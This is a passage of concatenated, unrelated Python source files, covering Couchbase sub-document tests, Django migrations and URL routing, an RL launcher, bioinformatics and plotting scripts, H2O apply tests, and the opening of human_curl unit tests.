path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.array_add_unique(inserted_keys, replace_string, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.counter_all_paths(inserted_keys, 1, path='height') #data_set.counter_all_paths(inserted_keys, replace_string, path='array') def test_simple_dataset_multi_lookup(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple multi lookup sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.multi_lookup_all_paths(inserted_keys, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.counter_all_paths(inserted_keys, 1, path='height') #data_set.counter_all_paths(inserted_keys, replace_string, path='array') def test_simple_dataset_multi_lookup2(self): pass def generate_string(self, range_val=100): long_string = ''.join(chr(97 + randint(0, 25)) for i in range(range_val)) return '"' + long_string + '"' def _get_path(self, subdoc_elt=None, levels=None): subdoc_path = subdoc_elt for i in range(levels-1): subdoc_path +='.'+subdoc_elt return subdoc_path class SimpleDataSet(SubdocSanityTests): def __init__(self, helper, num_docs): self.helper = helper self.num_docs = num_docs self.name = "simple_dataset" self.log = logger.Logger.get_logger() def load(self): inserted_keys = self.helper.insert_docs(self.num_docs, self.name) return inserted_keys def get_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.get_sd(in_key, path) except Exception as e: self.helper.testcase.fail( "Unable to get key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def upsert_all_docs(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.dict_upsert_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to upsert key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def add_all_docs(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.dict_add_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to add key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def remove_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.delete_sd(in_key, path) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to remove value for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def exists_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.exists_sd(in_key, path) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to validate value for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def replace_all_docs(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.replace_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to replace for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def array_push_last(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.array_push_last_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to array push last for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def array_push_first(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.array_push_first_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to array push first for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def counter_all_paths(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.counter_sd(in_key, path, 10000) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to counter incr/decr for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def array_add_unique(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.array_add_unique_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to add array_unique key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def multi_lookup_all_paths(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.multi_lookup_sd(in_key, path) print(data) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to add array_unique key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) class DeeplyNestedDataSet(SubdocSanityTests): def __init__(self, helper, num_docs): self.helper = helper self.num_docs = num_docs self.name = "deeplynested_dataset" self.levels = 30 self.log = logger.Logger.get_logger() def load(self, long_path=False): inserted_keys = self.helper.insert_nested_docs(self.num_docs, self.name, self.levels, long_path) return inserted_keys, self.levels def get_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.get_sd(in_key, path) #self.log.info(data) #assert data == check_data except Exception as e: self.log.info(e) self.helper.testcase.fail( "Unable to get key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def upsert_all_docs(self): pass import string import pyperclip from random import choice class User: """ Class that generates new instances of users. """ user_list = [] #Empty user list def __init__(self,username,password): """ __init__ method that defines properties for our objects Args: username: New user username. password: . """ self.username = username self.password = password def save_user(self): """ save_user method saves objects into list """ User.user_list.append(self) @classmethod def find_by_username(cls,username): ''' Method that takes in a username and returns a user that matched that username. Args: username: username to search for Returns: user that matched the username. ''' for user in cls.user_list: if user.username == username: return user @classmethod def user_exist(cls,username): ''' Method that checks if a user exists from the user list. Args: username: Username to search if it exists Returns : Boolean: True or false depending if the user exists ''' for user in cls.user_list: if user.username == username: return True return False class Credential: """ Class that generates new instances of credential """ credential_list = [] #Empty credential def __init__(self,acc_name,login_name,password): """ __init__ method that defines properties for our objects Args: acc_name: New credential acc_name. login_name: New credential login_name. password: . """ self.acc_name = acc_name self.login_name = login_name self.password = password def save_credential(self): """ save_credential method saves objects into list """ Credential.credential_list.append(self) def del_credential(self): ''' delete_credential method deletes a saved credential from the credential_list ''' Credential.credential_list.remove(self) @classmethod def find_by_acc_name(cls,acc_name): ''' Method that takes in a number and returns a credential that matches that account name. Args: acc_name: Account name to search for Returns : Credential of account that matches the account name and details. ''' for credential in cls.credential_list: if credential.acc_name == acc_name: return credential @classmethod def credential_exist(cls,acc_name): ''' Method that checks if a credential exists from the credential list. Args: acc_name: Account name to search if it exists Returns : Boolean: True or false depending if the credential exists ''' for credential in cls.credential_list: if credential.acc_name == acc_name: return True return False @classmethod def display_credentials(cls): ''' method that returns the credential list ''' return cls.credential_list health/migrations/0018_billing_record_medical_record_prescription.py # Generated by Django 3.1.4 on 2021-01-13 09:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('health', '0017_auto_20210111_0928'), ] operations = [ migrations.CreateModel( name='Prescription', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(blank=True, max_length=100, null=True)), ('quantity', models.CharField(blank=True, max_length=100, null=True)), ('days', models.CharField(blank=True, max_length=100, null=True)), ('time', models.CharField(blank=True, max_length=100, null=True)), ('appoint', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='health.appointment')), ], ), migrations.CreateModel( name='Medical_Record', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', models.DateField(blank=True, null=True)), ('disc', models.CharField(blank=True, max_length=100, null=True)), ('file', models.FileField(blank=True, null=True, upload_to='')), ('appoint', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='health.appointment')), ], ), migrations.CreateModel( name='Billing_Record', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(blank=True, max_length=100, null=True)), ('amount', models.IntegerField(blank=True, null=True)), ('appoint', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='health.appointment')), ], ), ] tuvapp/tuvappcom1-10 # coding=utf-8 from functools import wraps from faker.utils import text def slugify(fn): @wraps(fn) def wrapper(*args, **kwargs): return text.slugify(fn(*args, **kwargs)) return wrapper def slugify_domain(fn): @wraps(fn) def wrapper(*args, **kwargs): return text.slugify(fn(*args, **kwargs), allow_dots=True) return wrapper def slugify_unicode(fn): @wraps(fn) def wrapper(*args, **kwargs): return text.slugify(fn(*args, **kwargs), allow_unicode=True) return wrapper import argparse import torch import numpy as np import buffers import drl import envs def get_args(): """Basic configuration --------------------------------------------------------------------------- exp_name | the name of the experiment; the result will be saved at results/exp_name by default seed | random seed of the whole experiment under which the result should be the same scenario | the type/background of the environment env | environment to interact with, here we give some typical example control: CartPole-v1, Acrobot-v0, MountainCarContinuous-v0 atari: pong, qbert, freeway mujuco: HalfCheetah, Ant, Humanoid num_env | number of parallel environments algo | deep learning algorithm to choose disable_cuda | cpu training even when gpus are available """ parser = argparse.ArgumentParser(description="base configuration parser") parser.add_argument("--exp_name", default="unnamed", type=str, \ help="the name of the experiment; the result will be saved at results/exp_name by default") parser.add_argument("--seed", default=0, type=int, \ help="random seed of the whole experiment under which the result should be the same") parser.add_argument("--scenario", default="control", choices=["control", "atari", "mujoco"], \ help="the type/background of the environment") parser.add_argument("--env", default="CartPole-v1", type=str, \ help="environment to interact with") parser.add_argument("--num_env", default=1, type=int, \ help="number of parallel environments") parser.add_argument("--algo", default="dqn", \ choices=["dqn", "a2c", "ddpg", "rainbow", "ppo", "td3", "sac"], \ help="deep learning algorithm to choose") parser.add_argument("--disable_cuda", default=False, action="store_true", \ help="cpu training even when gpus are available") return parser.parse_known_args()[0] args = get_args() print("\n------ basic experimental configuration ------") for key, val in vars(args).items(): print("{:>20} | {}".format(key, val)) print("----------------------------------------------\n") np.random.seed(args.seed) torch.manual_seed(np.random.randint(1e9)) torch.backends.cudnn.benchmark = False torch.backends.cudnn.deterministic = True # See https://pytorch.org/docs/stable/notes/randomness.html if torch.cuda.is_available() and not args.disable_cuda: device = torch.device("cuda") torch.cuda.manual_seed(np.random.randint(1e9)) else: device = torch.device("cpu") torch.set_num_threads(4) env, test_env = envs.make_env(args) test_env.eval() buffer = buffers.make_buffer(args, env) if args.algo == "dqn": drl.DQN(env, test_env, device, buffer) elif args.algo == "a2c": drl.A2C(env, test_env, device, buffer) elif args.algo == "ddpg": drl.DDPG(env, test_env, device, buffer) elif args.algo == "rainbow": drl.Rainbow(env, test_env, device, buffer) elif args.algo == "ppo": drl.PPO(env, test_env, device, buffer) elif args.algo == "td3": drl.TD3(env, test_env, device, buffer) elif args.algo == "sac": drl.SAC(env, test_env, device, buffer) else: raise ValueError("algorithm not defined")SED/plot_SEDs.py #!/usr/bin/env python from __future__ import division from past.utils import old_div import os, sys import tableio import pylab seds = sys.argv[1:] pylab.figure(1) fmax = 0.0 for sed in seds: (w, f) = tableio.get_data(sed, cols=(0, 1)) #fmax = max(f.max(),fmax) f = old_div(f, f.max()) #print fmax pylab.semilogx(w, f, label=sed) pylab.xlim(1000, 5e4) pylab.legend() pylab.show() pylab.close() import re from Bio import SeqIO import os import argparse def getmatchpositions(regexp, seq): matches = [(m.start(0)) for m in re.finditer(regexp, seq)] return matches def regexpmeta(fasta, bins): motif = r'(?=([AU]GG(.{0,7})[AU]GG(.{0,7})[AU]GG(.{0,7})[AU]GG))' bins = float(bins) motiffrac = {} #{binnumber : [number of times you find motif in this bin, number of times you looked]} for i in range(int(bins)): motiffrac[i + 1] = [0, 0] for record in SeqIO.parse(fasta, 'fasta'): seq = str(record.seq.transcribe()) for i in range(len(seq)): pos = i + 1 posbin = int(round((pos / float(len(seq))) * bins)) if posbin == 0: posbin = 1 motiffrac[posbin][1] +=1 matches = getmatchpositions(motif, seq) for match in matches: pos = match + 1 posbin = int(round((pos / float(len(seq))) * bins)) if posbin == 0: posbin = 1 motiffrac[posbin][0] +=1 return motiffrac def writebins(motiffrac, region, seqclass, outfile): if not os.path.isfile(outfile): with open(outfile, 'w') as f: f.write(('\t').join(['Bin', 'frac', 'region', 'class']) + '\n') with open(outfile, 'a') as f: for posbin in motiffrac: frac = motiffrac[posbin][0] / float(motiffrac[posbin][1]) f.write(('\t').join([str(posbin), str(frac), region, seqclass]) + '\n') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--fasta', type = str, help = 'Fasta file of sequences to look through.') parser.add_argument('--bins', type = str, help = 'Number of bins for metagene.') parser.add_argument('--region', type = str, help = 'Transcript region of fasta.') parser.add_argument('--seqclass', type = str, help = 'Delta LR class of fasta.') parser.add_argument('--outfile', type = str, help = 'Output file.') args = parser.parse_args() motiffrac = regexpmeta(args.fasta, args.bins) writebins(motiffrac, args.region, args.seqclass, args.outfile) pywikc/constraint.py class ConstraintTerm: """ A single term in a linear constraint equation. """ def __init__(self, node, dof, coef, name=''): """ Constructor. :param int node: Tag of the node. :param int dof: Degree of freedom at the node. :param float coef: Coefficient in the constraint. :param str name: Identifier for the term. """ self.node = node self.dof = dof self.coef = coef self.name = name return class Constraint: """ Defines a linear constraint equation in standard form. Standard form is: \\sum_i \\sum_j c^j_i u^j_i = 0, where i is the node ID, j indicates the DOF, c^j_i is the coefficient, and u^j_i is the DOF specified by i and j. The user needs to specify the node, DOF, and coefficient for all the terms in the equation. """ def __init__(self, constr_name=''): """ Constructor. :param str constr_name: Identifier for the constraint equation. """ self.constr_name = constr_name self.terms = [] return def add_term(self, node, dof, coef, name=''): self.terms.append(ConstraintTerm(node, dof, coef, name)) return class DashboardException(Exception): pass class NotionClientException(Exception): """For SDK external exceptions.""" pass from eve import Eve from eve_swagger import swagger app = Eve() app.register_blueprint(swagger) # required. See http://swagger.io/specification/#infoObject for details. app.config['SWAGGER_INFO'] = { 'title': 'Recipe API', 'version': '1.0', 'description': 'an API description', 'termsOfService': 'my terms of service', 'contact': { 'name': 'nicola', 'url': 'http://nicolaiarocci.com' }, 'license': { 'name': 'BSD', 'url': 'https://github.com/pyeve/eve-swagger/blob/master/LICENSE', }, 'schemes': ['http', 'https'], } if __name__ == '__main__': app.run() module/globals/get_variable.py #!/usr/bin/env python3 from config_element.yaml_manager import ConfYaml from base.logger import logged, LOGGER @logged def get_var(key, value=None): if key == 'phone': if value: return ConfYaml('user.yaml').read()[value] for phone in ConfYaml('user.yaml').read(): yield phone if key == 'user_id' or key == 'token' or key == 'order_id' or key == 'pay_password': if value: return ConfYaml('user.yaml').read()[value][key] else: raise ValueError("取 {} 必须传手机号!".format(key)) globals_var = ConfYaml('global_variable.yaml').read() if globals_var: if key in globals_var: return globals_var[key] else: return LOGGER.info('key :{}, value: {}'.format(key, value)) raise KeyError("没找到变量!") @logged def push_var(var, phone, value=None) -> bool: if var == 'phone': return ConfYaml('user.yaml').update({phone: None}) if var == 'user_id' or var == 'token' or var == 'order_id' or var == 'pay_password': if value: return ConfYaml('user.yaml').update({phone: {var: value}}) else: raise ValueError("取 {} 必须传手机号!".format(var)) return ConfYaml('global_variable.yaml').update({var: phone}) # -*- coding: utf-8 -*- """Tests for `{{ cookiecutter.project_slug }}` package.""" {% if cookiecutter.use_pytest == 'y' -%} import pytest {% else %} import unittest {%- endif %} {%- if cookiecutter.command_line_interface|lower == 'click' %} from click.testing import CliRunner {%- endif %} from {{ cookiecutter.project_slug }} import {{ cookiecutter.project_slug }} {%- if cookiecutter.command_line_interface|lower == 'click' %} from {{ cookiecutter.project_slug }} import cli {%- endif %} {%- if cookiecutter.use_pytest == 'y' %} def test_command_line_interface(): """Test the CLI.""" runner = CliRunner() result = runner.invoke(cli.main) assert result.exit_code == 0 assert '{{ cookiecutter.project_slug }}.cli.main' in result.output help_result = runner.invoke(cli.main, ['--help']) assert help_result.exit_code == 0 assert '--help Show this message and exit.' in help_result.output {%- endif %} Yessense/script-extractdatasets/race/look_on_race.py import hashlib import os import pickle from src.script_extraction.sign.extract_script import create_signs from src.script_extraction.visualization.show_script import show_script saved_files_dir = '/texts/saved/' saved_files = [os.path.basename(f) for f in os.listdir(saved_files_dir)] TEXT_FOLDER = "/home/yessense/PycharmProjects/ScriptExtractionForVQA/texts/Race/" nice_texts = ['80.txt', '59.txt', '43.txt', '84.txt', '24.txt'] files = [os.path.join(TEXT_FOLDER, f) for f in os.listdir(TEXT_FOLDER) if os.path.isfile(os.path.join(TEXT_FOLDER, f))] for filepath in files: h = hashlib.sha1(filepath.encode()).hexdigest() if h in saved_files: with open(os.path.join(saved_files_dir, h), 'rb') as f: info = pickle.load(f) script = create_signs(info) show_script(script, group_roles=True) print(f'{filepath} processed') import deuce def DeuceContextHook(req, resp, params): """ Deuce Context Hook """ from threading import local as local_factory deuce.context = local_factory() deuce.context.datacenter = deuce.conf.api_configuration.datacenter.lower() PythonDataIntegrator/pythondataintegratorsrc/api/infrastructure/api/decorators/Endpoint.py10-100 import json from functools import wraps from infrastructure.api.EndpointWrapper import EndpointWrapper from infrastructure.utils.TypeChecker import TypeChecker class _Endpoint: def __init__(self, function, namespace=None): self.namespace = namespace self.function = function self.endpoint_wrapper = EndpointWrapper() def __call__(self, *args, **kwargs): input_type, input_name = self.find_input_type() req = None if input_type is not None and input_name is not None: if TypeChecker().is_class(input_type): if self.function.__name__ == 'get': req = self.endpoint_wrapper.get_request_from_parser(input_type) else: req = self.endpoint_wrapper.get_request_from_body(input_type) else: req = self.endpoint_wrapper.get_request_from_parser_for_primitive(input_name, input_type) if req is not None: res = self.function(args[0], req, **kwargs) else: res = self.function(args[0], **kwargs) if self.return_type() is not None: result = json.loads(json.dumps(res.to_dict(), default=self.endpoint_wrapper.date_converter)) endpoint_response = self.endpoint_wrapper.get_response(result=result) return endpoint_response else: endpoint_response = self.endpoint_wrapper.get_response(result=res) return endpoint_response def input_type_names(self): self.function.__annotations__.keys() return self.function.__annotations__.keys().remove("return") def input_types(self): input_annotations = self.function.__annotations__ input_argument_types = [] input_argument_names = [] for annotation_key in input_annotations.keys(): if annotation_key != "return": argument_type = input_annotations[annotation_key] input_argument_types.append(argument_type) input_argument_names.append(annotation_key) return input_argument_types, input_argument_names def return_type(self): if "return" in self.function.__annotations__: return self.function.__annotations__["return"] else: return None def find_input_type(self): input_types, input_names = self.input_types() if input_types == None or len(input_types) == 0: return None, None elif len(input_types) == 1: return input_types[0], input_names[0] else: return None, None def expect_inputs(self): input_type, input_name = self.find_input_type() expect_model = None if input_type is not None and input_name is not None: if TypeChecker().is_class(input_type): if self.function.__name__ == 'get': expect_model = self.endpoint_wrapper.request_parser(input_type) else: expect_model = self.endpoint_wrapper.request_model(input_type) else: expect_model = self.endpoint_wrapper.create_parser(input_name, input_type) return expect_model def marshal_with_fields(self): if self.return_type() is None: fields = self.endpoint_wrapper.BaseModel else: fields = self.endpoint_wrapper.response_model(self.return_type()) return fields def endpoint(namespace): def decorator(function): def instance() -> _Endpoint: _instance = _Endpoint(function, namespace) return _instance @wraps(function) @namespace.expect(instance().expect_inputs(), validate=True) @namespace.marshal_with(instance().marshal_with_fields()) def wrapper(*args, **kwargs): return instance().__call__(*args, **kwargs) return wrapper return decorator # Generated by Django 2.0.5 on 2018-05-16 08:51 from django.db import migrations, models DIST_PYTHON3 = { '3.4': ['14.04', 'dubnium', 'jessie'], '3.5': ['16.04'], '3.6': ['17.10', '18.04'], } def add_python3(apps, schema_editor): Target = apps.get_model('rainboard', 'Target') for python3, names in DIST_PYTHON3.items(): Target.objects.filter(name__in=names).update(python3=python3) class Migration(migrations.Migration): dependencies = [ ('rainboard', '0012_target'), ] operations = [ migrations.AddField( model_name='target', name='python3', field=models.CharField(blank=True, max_length=3, null=True), ), migrations.RunPython(add_python3), ] #!/usr/bin/env python # -*- encoding: utf-8 -*- from __future__ import division, print_function from future.utils import PY2 import sys sys.path.insert(1, "../../") import h2o from tests import pyunit_utils import pandas as pd from pandas.util.testing import assert_frame_equal import numpy as np from functools import partial def h2o_to_float(h2o, pd): """ The method transform h2o result into a frame of floats. It is used as assert helper to compare with Pandas results. :return: """ return (h2o.astype(float), pd) def pd_to_int(h2o, pd): return (h2o, pd.apply(lambda x: 1 if x else 0)) # # List of operators which are usable in lambda expression # as parameter of `apply` function. # # Structure: ' : [h2o expression, # supported axis, # corresponding pandas expression or None if it is same as h2o expression, # assert transformer or None to use default # ] # # Note (1): not all operators support all directions. # # Note (2): some of operators produces differently typed results than Pandas which is used for results # validation. Hence, each record can specify transformation before assert is invoked. # # Operators N:1 - transform a vector to a number # OPS_VEC_TO_SCALAR = { "mean": [lambda x: x.mean(), [0,1], None, None], "median": [lambda x: x.median(), [0], None, h2o_to_float], "max": [lambda x: x.max(), [0,1], None, h2o_to_float], "min": [lambda x: x.min(), [0,1], None, h2o_to_float], "sd": [lambda x: x.sd(), [0], lambda x: x.std(), None], "nacnt": [lambda x: x.nacnt(), [0], lambda x: sum(x.isnull()), None], } # Operators N:N - are applied on each element in vector OPS_VEC_TO_VEC = { "adhoc-fce" : [lambda col: (col * col - col * 5 * col).abs() - 3.14, [0], None, None], "abs" : [lambda col: col.abs(), [0], None, None], "cos" : [lambda col: col.cos(), [0], lambda col: np.cos(col), None], "sin" : [lambda col: col.sin(), [0], lambda col: np.sin(col), None], "cosh" : [lambda col: col.cosh(), [0], lambda col: np.cosh(col), None], "exp" : [lambda col: col.exp(), [0], lambda col: np.exp(col), None], "sqrt" : [lambda col: col.sqrt(), [0], lambda col: np.sqrt(col), h2o_to_float], "tan" : [lambda col: col.tan(), [0], lambda col: np.tan(col), None], "tanh" : [lambda col: col.tanh(), [0], lambda col: np.tanh(col), h2o_to_float], "ceil" : [lambda col: col.ceil(), [0], lambda col: np.ceil(col), h2o_to_float], "floor" : [lambda col: col.floor(), [0], lambda col: np.floor(col), h2o_to_float], "log" : [lambda col: col.log(), [], lambda col: np.log(col), None], "select" : [lambda x: x["PSA"], [1], None, None], "select2": [lambda x: x['PSA'] > x['VOL'], [1], None, pd_to_int], "select3": [lambda x: 1 if x['PSA'] > x['VOL'] else 0, [], None, None] } def datafile(): return pyunit_utils.locate("smalldata/logreg/prostate.csv") def h2o_frame_fixture(): return h2o.import_file(datafile()) def pandas_frame_fixture(): return pd.read_csv(datafile()) def test_ops(fr, pf, ops_map): for axis in range(0,2): tester = partial(test_lambda, fr, pf, axis=axis) for name, op in ops_map.items(): fce, supported_axes, pandas_fce, assert_transf = op assert_fce = get_assert_fce_for_axis(axis, assert_transf) op_desc = "Op '{}' (axis={}) ".format(name, axis) print(op_desc, end='') if axis not in supported_axes: print("UNSUPPORTED") else: tester(fce=fce, pandas_fce=pandas_fce, assert_fce=assert_fce) print("OK") def pyunit_apply_n_to_1_ops(): # H2O Frame fr = h2o_frame_fixture() # And Pandas DataFrame pf = pandas_frame_fixture() test_ops(fr, pf, OPS_VEC_TO_SCALAR) def pyunit_apply_n_to_n_ops(): # H2O Frame fr = h2o_frame_fixture() # And Pandas DataFrame pf = pandas_frame_fixture() test_ops(fr, pf, OPS_VEC_TO_VEC) def pyunit_apply_with_args(): fr = h2o_frame_fixture() ref = fr.scale(center=False, scale=False).as_data_frame() #vars false = False args = (False, False) kwargs = dict(center=False, scale=False) partial_args = (False,) partial_kwargs = dict(scale=False) to_test = dict( scale_with_arg=lambda x: x.scale(False, False), scale_with_kwarg=lambda x: x.scale(center=False, scale=False), scale_with_argkwarg=lambda x: x.scale(False, scale=False), scale_with_global_arg=(lambda x: x.scale(false, scale=false)), scale_with_args=(lambda x: x.scale(*args)), scale_with_kwargs=(lambda x: x.scale(**kwargs)), scale_with_partial_args=(lambda x: x.scale(False, *partial_args)), scale_with_partial_kwargs=(lambda x: x.scale(False, **partial_kwargs)), scale_with_partial_kwargs2=(lambda x: x.scale(center=False, **partial_kwargs)), scale_with_args_and_kwargs=(lambda x: x.scale(*partial_args, **partial_kwargs)), scale_with_all_kind_args=(lambda x: x.scale(False, *partial_args, scale=False, **partial_kwargs)) if not PY2 else None, # surprisingly this works because our signature verification is not that strict, but it's fine... at least behaves as expected. ) for test, lbd in to_test.items(): if lbd: print(test) res = fr.apply(lbd) res_df = res.as_data_frame() assert_frame_equal(res_df, ref) h2o.remove(res) def test_lambda(h2o_frame, panda_frame, fce, axis, assert_fce, pandas_fce=None): h2o_result = h2o_frame.apply(fce, axis=axis).as_data_frame() pd_result = panda_frame.apply(pandas_fce if pandas_fce else fce, axis=axis) assert_fce(h2o_result, pd_result) def get_assert_fce_for_axis(axis, assert_transf=None): assert_fce = __AXIS_ASSERTS__[axis] if assert_transf: return lambda h2o,pd: assert_fce(*assert_transf(h2o,pd)) else: return assert_fce def assert_row_equal(h2o_result, pd_result): if type(pd_result) is pd.core.frame.Series: pd_result = pd_result.to_frame(h2o_result.columns[0]) assert_frame_equal(h2o_result, pd_result) def assert_column_equal(h2o_result, pd_result): if type(pd_result) is pd.core.frame.Series: pd_result = pd_result.to_frame().transpose() assert_frame_equal(h2o_result, pd_result) __AXIS_ASSERTS__ = { 0: assert_column_equal, 1: assert_row_equal} __TESTS__ = [pyunit_apply_n_to_n_ops, pyunit_apply_n_to_1_ops, pyunit_apply_with_args] if __name__ == "__main__": for func in __TESTS__: pyunit_utils.standalone_test(func) else: for func in __TESTS__: func() core/urls.py """core URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.conf import settings from django.conf.urls.static import static from django.contrib import admin from django.urls import include, path from drf_yasg import openapi from drf_yasg.views import get_schema_view from rest_framework import permissions from rest_framework.documentation import include_docs_urls API_TITLE = 'Vuln API' API_DESCRIPTION = 'A Web API for evaluating vulnerabilities in a project' schema_view = get_schema_view( openapi.Info( title=API_TITLE, default_version='v1', description=API_DESCRIPTION, terms_of_service='https://www.google.com/policies/terms/', contact=openapi.Contact(email=''), license=openapi.License(name='BSD License'), ), public=True, permission_classes=(permissions.AllowAny,), ) urlpatterns = [ # Django administration path('dj-admin/', admin.site.urls), # Local apps path('', include('datasets.urls')), # Rest API path('api/v1/', include('api.urls')), path('docs/', include_docs_urls(title=API_TITLE, description=API_DESCRIPTION)), path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'), path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) test/cases/for_else.py import end for i in range(3): pass else: if True: pass # end is missing here end 1-10 # -*- coding: utf-8 -*- # Generated by Django 1.11.12 on 2018-04-18 02:26 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rrs', '0016_rmh_layerbranch_nonnull'), ] operations = [ migrations.AddField( model_name='maintenanceplan', name='maintainer_style', field=models.CharField(choices=[('I', 'Per-recipe - maintainers.inc'), ('L', 'Layer-wide')], default='L', help_text='Maintainer tracking style for the layers within this plan', max_length=1), ), ] krshrimali/ChatBot-IIITNR import os os.system("node bot.js") text = "What is my name?" 0 #!/usr/bin/env python # -*- coding: utf-8 -*- """ human_curl.tests ~~~~~~~~~~~~~~~~ Unittests for human_curl :copyright: (c) 2011 - 2012 by (). :license: BSD, see LICENSE for more details. """ import io import os import time import pycurl import http.cookiejar from http.cookies import Morsel import json import uuid from random import randint, choice from string import ascii_letters, digits import logging from urllib.parse import urljoin import unittest import urllib.request, urllib.parse, urllib.error from types import FunctionType from urllib.parse import urlencode import human_curl as requests from human_curl import Request, Response from human_curl import AsyncClient from human_curl.auth import * from human_curl.utils import * from human_curl.exceptions import (CurlError, InterfaceError) logger = logging.getLogger("human_curl.test") async_logger = logging.getLogger("human_curl.core") async_logger.setLevel(logging.DEBUG) ## # Add the log message handler to the logger ## # LOG_FILENAME = os.path.join(os.path.dirname(__file__), "debug.log") ## # handler = logging.handlers.FileHandler(LOG_FILENAME) handler = logging.StreamHandler() formatter = logging.Formatter("%(levelname)s %(asctime)s %(module)s [%(lineno)d] %(process)d %(thread)d | %(message)s ") handler.setFormatter(formatter) async_logger.addHandler(handler) TEST_METHODS = ( ('get', requests.get), ('post', requests.post), ('head', requests.head), ('delete', requests.delete), ('put', requests.put), ('options', requests.options)) # Use https://github.com/Lispython/httphq HTTP_TEST_URL = os.environ.get('HTTP_TEST_URL', 'http://httpbin.org') HTTPS_TEST_URL = os.environ.get('HTTPS_TEST_URL', 'http://httpbin.org') CurlError("Use {0} as test server".format(HTTP_TEST_URL)) def build_url(*parts): return urljoin(HTTP_TEST_URL, "/".join(parts)) def build_url_secure(*parts): return urljoin(HTTPS_TEST_URL, "/".join(parts)) TEST_SERVERS = (build_url, build_url_secure) def stdout_debug(debug_type, debug_msg): """Print messages """ debug_types = ('I', '<', '>', '<', '>') if debug_type == 0: print(('%s' % debug_msg.strip())) elif debug_type in (1, 2): for line in debug_msg.splitlines(): print(('%s %s' % (debug_types[debug_type], line))) elif debug_type == 4: print(('%s %r' % (debug_types[debug_type], debug_msg))) def random_string(num=10): return ''.join([choice(ascii_letters + digits) for x in range(num)]) class BaseTestCase(unittest.TestCase): @staticmethod def random_string(num=10): return random_string(10) def random_dict(self, num=10): return dict([(self.random_string(10), 